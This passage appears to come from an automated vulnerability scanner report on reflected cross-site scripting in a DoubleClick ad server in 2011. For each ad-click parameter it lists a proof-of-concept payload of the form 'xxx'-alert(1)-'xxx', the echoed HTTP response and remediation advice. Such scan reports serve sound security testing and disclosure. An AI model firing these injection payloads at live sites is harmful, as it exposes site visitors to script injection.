<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956ae57a'-alert(1)-'cfb43500a9c&_pn=17185423&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x25 ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c50ad'-alert(1)-'a22d8d8e435 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4313 Date: Tue, 28 Jun 2011 02:19:02 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423c50ad'-alert(1)-'a22d8d8e435&redirect=https%3a%2f%2fwww.discovercard.com/cardmembersvcs/acqs/app/getapp%3Fsc%3DKBD6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/OpenRoad_300x250.swf'; var d ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a71'-alert(1)-'e380434b323 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4194 Date: Tue, 28 Jun 2011 02:17:42 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=1168326a71'-alert(1)-'e380434b323&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http:// ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290e8'-alert(1)-'d38eb4805ab was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4205 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 02:19:18 GMT Expires: Tue, 28 Jun 2011 02:19:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b00611&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=290e8'-alert(1)-'d38eb4805abhttps://www.discovercard.com/cardmembersvcs/acqs/app/display?pageFileId=more15&sc=KBC6'; var target = '_blank'; var dcbgcolor = ''; var dcswf = 'http://s0.2mdn.net/1796512/pickAcard300x250v2.swf'; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35db2'-alert(1)-'3a61e2f6500 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4194 Date: Tue, 28 Jun 2011 02:15:50 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ext = ''; var dcgif = 'http://s0.2mdn.net/1796512/CB300x250.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=7cfbb6e2-3fdd-4a0a-93c9-868dc1b0061135db2'-alert(1)-'3a61e2f6500&_o=15755&_eo=97956&_et=1309227310&_a=17184852&_s=11683&_d=17184856&_c=36983&_pm=97956&_pn=17185423&redirect=http%3a%2f%2fdiscovercard.com/credit-cards/cardbuilder/index.html%3Fiq_id%3Do1112'; var targ ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3037d'-alert(1)-'8e6906997c7 was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:11:33 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 6/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=218682303037d'-alert(1)-'8e6906997c7&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize% ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d821'-alert(1)-'7814853e8be was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:12:36 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... tivewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=158092d821'-alert(1)-'7814853e8be&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash% ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32bc3'-alert(1)-'30e27806cb7 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:12:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ar dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=2186785932bc3'-alert(1)-'30e27806cb7&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13a0b'-alert(1)-'b4090b2e029 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:10:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'http://s0.2mdn.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=9795613a0b'-alert(1)-'b4090b2e029&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTPr ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48fcb'-alert(1)-'890adbd91c3 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:11:12 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... n.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=130923056948fcb'-alert(1)-'890adbd91c3&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%2 ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb7b5'-alert(1)-'a24c9917e30 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:10:30 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... ar dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607cb7b5'-alert(1)-'a24c9917e30&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3 ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cbc3'-alert(1)-'e281d6b67ee was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:12:57 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=979565cbc3'-alert(1)-'e281d6b67ee&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3 ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37287'-alert(1)-'39e905a1df2 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:13:18 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=2186867337287'-alert(1)-'39e905a1df2&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mass-_- ...[SNIP]...
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9899c'-alert(1)-'b732d4a27f7 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:11:54 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... _ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=116839899c'-alert(1)-'b732d4a27f7&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D300x250 ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 518ed'-alert(1)-'4b93262946f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5736 Cache-Control: no-cache Pragma: no-cache Date: Tue, 28 Jun 2011 03:13:31 GMT Expires: Tue, 28 Jun 2011 03:13:31 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc963851&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=518ed'-alert(1)-'4b93262946fhttp://www.fingerhut.com/user/pre_screen_credit.jsp?CTid=471&CTKey=PS1Reach&CTMedia=x1&CTProgType=mass&CTUnitSize=300x250&CTTestGrp=flash&cm_mmc=x1-_-mass-_-300x250-_-flash'; var target = '_blank'; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e8c0'-alert(1)-'1349c693deb was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5978 Date: Tue, 28 Jun 2011 03:10:14 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <!-- Copyright DoubleClick Inc., All rights reserved. --> <!- ...[SNIP]... t = ''; var dcgif = 'http://s0.2mdn.net/1887566/300x250_ps1.jpg'; var dccreativewidth = '300'; var dcwmode = 'opaque'; var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=84d0b30e-7270-4d5a-8044-9f37bc9638518e8c0'-alert(1)-'1349c693deb&_o=15607&_eo=97956&_et=1309230569&_a=21868230&_s=11683&_d=21867859&_c=15809&_pm=97956&_pn=21868673&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3DPS1Reach%26 ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4efc"-alert(1)-"09524b1daae was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:13:10 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939d4efc"-alert(1)-"09524b1daae&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef7"-alert(1)-"e411786e44c was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:14:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=184421635bef7"-alert(1)-"e411786e44c&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = " ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebf06"-alert(1)-"f9932b774ce was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:13:54 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 07-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228ebf06"-alert(1)-"f9932b774ce&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscri ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee414"-alert(1)-"0759993d50b was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:12:28 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956ee414"-alert(1)-"0759993d50b&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee567"-alert(1)-"51b02d198a9 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:12:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 2306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069ee567"-alert(1)-"51b02d198a9&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c823"-alert(1)-"7422a3948b0 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:12:07 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=184421361c823"-alert(1)-"7422a3948b0&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = fa ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 870d7"-alert(1)-"e17bcc3401c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6781 Date: Tue, 28 Jun 2011 02:14:36 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956870d7"-alert(1)-"e17bcc3401c&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a245"-alert(1)-"cb1a8ffbfb9 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
